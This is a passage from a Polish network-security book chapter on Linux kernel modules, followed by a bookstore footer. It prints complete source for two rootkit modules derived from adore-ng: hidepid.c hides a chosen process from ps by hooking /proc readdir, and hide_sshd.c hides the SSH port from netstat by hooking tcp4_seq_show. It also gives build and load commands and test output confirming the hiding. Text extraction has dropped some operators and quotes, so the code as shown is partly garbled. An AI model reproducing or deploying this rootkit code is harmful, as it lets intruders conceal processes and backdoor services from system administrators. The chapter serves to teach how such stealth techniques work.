return proc_filldir(buf, name, nlen, off, ino, x); W chwili usunięcia LKM zostaje wywołana funkcja restore(), aby przywrócić oryginalną procedurę obsługi operacji readdir katalogu /proc: if ((filep = filp_open( /proc , O_RDONLY, 0)) == NULL) return -1; filep- f_op- readdir = orig_readdir; 178 | Rozdział 7. Zabawa z modułami jądra Linuksa hidepid.c Oto pełny kod źródłowy naszego ładowalnego modułu jądra hidepid: /*Podziękowania dla adore-ng ze Stealth za pomysły użyte w tym kodzie*/ #include linux/kernel.h #include linux/module.h #include linux/init.h #include net/sock.h #define HIDEPID 4781 typedef int (*readdir_t)(struct file *, void *, filldir_t); readdir_t orig_proc_readdir=NULL; filldir_t proc_filldir = NULL; /*Konwertujemy string na integer. Usuwamy znaki nienależące do integer. Autorstwa adore-ng*/ int adore_atoi(const char *str) { int ret = 0, mul = 1; const char *ptr; for (ptr = str; *ptr = 0 *ptr = 9 ; ptr++) ; ptr--; while (ptr = str) { if (*ptr 0 || *ptr 9 ) break; ret += (*ptr - 0 ) * mul; mul *= 10; ptr--; } return ret; } int my_proc_filldir (void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x) { /*Jeśli nazwa odpowiada naszemu PID, zwracamy 0. Dzięki temu nasz PID nie jest widoczny*/ if(adore_atoi(name)==HIDEPID) { return 0; } /*W przeciwnym razie wywołujemy oryginalną filldir*/ return proc_filldir(buf, name, nlen, off, ino, x); } int my_proc_readdir(struct file *fp, void *buf, filldir_t filldir) { int r=0; proc_filldir = filldir; /*Wywołujemy orig_proc_readdir z my_proc_filldir*/ r=orig_proc_readdir(fp,buf,my_proc_filldir); return r; } Ukrywanie procesów | 179 int hide_pid(readdir_t *orig_readdir, readdir_t new_readdir) { struct file *filep; /*otwieramy /proc */ if((filep = filp_open( /proc ,O_RDONLY,0))==NULL) { return -1; } /*zapamiętujemy readdir katalogu /proc*/ if(orig_readdir) *orig_readdir = filep- f_op- readdir; /*ustawiamy readdir katalogu /proc na new_readdir*/ filep- f_op- readdir=new_readdir; filp_close(filep,0); return 0; } /*przywracamy readdir katalogu /proc*/ int restore (readdir_t orig_readdir) { struct file *filep; /*otwieramy /proc */ if ((filep = filp_open( /proc , O_RDONLY, 0)) == NULL) { return -1; } /*przywracamy readdir katalogu /proc*/ filep- f_op- readdir = orig_readdir; filp_close(filep, 0); return 0; } static int __init myinit(void) { hide_pid( orig_proc_readdir,my_proc_readdir); return 0; } static void myexit(void) { restore(orig_proc_readdir); } module_init(myinit); module_exit(myexit); MODULE_LICENSE( GPL ); Kompilacja i test hidepid Posłużymy się plikiem makefile zawierającym wpis: obj-m += hidepid.o 180 | Rozdział 7. Zabawa z modułami jądra Linuksa Do skompilowania programu posłuży polecenie: [nieroot]$ make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules Przetestujemy moduł, wyświetlając najpierw poleceniem ps proces sleep, który uprzednio zainicjalizowaliśmy: [nieroot]$ ps a | grep 4781 4781 tty1 S 0:00 sleep 999999 6545 tty1 R 0:00 grep 4781 Załadujemy moduł: [root]# insmod ./hidepid.ko Teraz proces sleep jest niewidoczny: [nieroot]$ ps a | grep 4781 6545 tty1 R 0:00 grep 4781 Po zakończeniu prób należy usunąć moduł z jądra: [root]# rmmod hidepid Ukrywanie połączeń przed narzędziem netstat Polecenie netstat pozwala wyświetlić listę usług sieciowych uruchomionych aktualnie w hoście: [nieroot]$ netstat -na Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN udp 0 0 0.0.0.0:68 0.0.0.0:* Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node Path unix 2 [ ACC ] STREAM LISTENING 2085 /dev/gpmctl unix 6 [ ] DGRAM 1886 /dev/log unix 2 [ ] DGRAM 2153 unix 2 [ ] DGRAM 2088 unix 2 [ ] DGRAM 2046 unix 2 [ ] DGRAM 1894 Rootkit Adore pozwala ukryć wybrany zestaw usług nasłuchujących połączeń przed programem netstat. Odbywa się to przez zmianę za pomocą wyeksportowanej struktury proc_net funkcji obsługi tcp4_seq_show(), która jest wywoływana przez jądro, gdy netstat odpytuje o nasłuchu- jące połączenia. W funkcji hacked_tcp4_seq_show() w programie hide_sshd.c funkcja strnstr() służy do szukania w seq- buf podciągu zawierającego postać szesnastkową portu, który ma zostać ukryty. W razie znalezienia łańcuch ten jest usuwany. hide_sshd.c Oto pełny kod źródłowy naszego ładowalnego modułu jądra hide_sshd: /*Podziękowania dla adore-ng ze Stealth za pomysły użyte w tym kodzie*/ #include linux/kernel.h #include linux/module.h #include linux/proc_fs.h #include linux/init.h #include net/tcp.h Ukrywanie połączeń przed narzędziem netstat | 181 /*z net/ipv4/tcp_ipv4.c*/ #define TMPSZ 150 /*ukrywamy sshd*/ #define PORT_TO_HIDE 22 MODULE_LICENSE( GPL ); int (*old_tcp4_seq_show)(struct seq_file*, void *) = NULL; char *strnstr(const char *haystack, const char *needle, size_t n) { char *s = strstr(haystack, needle); if (s == NULL) return NULL; if (s-haystack+strlen(needle) = n) return s; else return NULL; } int hacked_tcp4_seq_show(struct seq_file *seq, void *v) { int retval=old_tcp4_seq_show(seq, v); char port[12]; sprintf(port, 04X ,PORT_TO_HIDE); if(strnstr(seq- buf+seq- count-TMPSZ,port,TMPSZ)) seq- count -= TMPSZ; return retval; } static int __init myinit(void) { struct tcp_seq_afinfo *my_afinfo = NULL; struct proc_dir_entry *my_dir_entry = proc_net- subdir; while (strcmp(my_dir_entry- name, tcp )) my_dir_entry = my_dir_entry- next; if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry- data)) { old_tcp4_seq_show = my_afinfo- seq_show; my_afinfo- seq_show = hacked_tcp4_seq_show; } return 0; } static void myexit(void) { struct tcp_seq_afinfo *my_afinfo = NULL; struct proc_dir_entry *my_dir_entry = proc_net- subdir; while (strcmp(my_dir_entry- name, tcp )) my_dir_entry = my_dir_entry- next; 182 | Rozdział 7. Zabawa z modułami jądra Linuksa if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry- data)) { my_afinfo- seq_show=old_tcp4_seq_show; } } module_init(myinit); module_exit(myexit); Kompilacja i test hide_sshd W kodzie źródłowym hide_sshd.c przyjęto założenie, że próbujemy ukryć obecność demona sshd uruchomionego w hoście. Aby ukryć inną usługę, należy zmienić wartość PORT_TO_HIDE. Na potrzeby przykładu zakładamy, że w hoście jest uruchomiony sshd. Możemy to sprawdzić poleceniem netstat: [nieroot]$ netstat -na | grep 22 tcp 0 0.0.0.0:22 0.0.0.0:* LISTEN Posłużymy się plikiem makefile zawierającym: obj-m += hide_sshd.o Do kompilacji użyjemy następującego polecenia make: [nieroot]$ make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules Załadujemy moduł: [root]# insmod ./hide_sshd.ko Teraz demon sshd będzie niewidoczny (ponownie użyjemy polecenia netstat): [nieroot]# netstat -na | grep 22 Po zakończeniu prób należy usunąć moduł z jądra: [root]# rmmod hide_sshd Ukrywanie połączeń przed narzędziem netstat | 183
Pobierz darmowy fragment (pdf)

Gdzie kupić całą publikację:

Bezpieczeństwo sieci. Narzędzia
Autor:
,

Opinie na temat publikacji:


Inne popularne pozycje z tej kategorii:


Czytaj również:


Prowadzisz stronę lub blog? Wstaw link do fragmentu tej książki i współpracuj z Cyfroteką: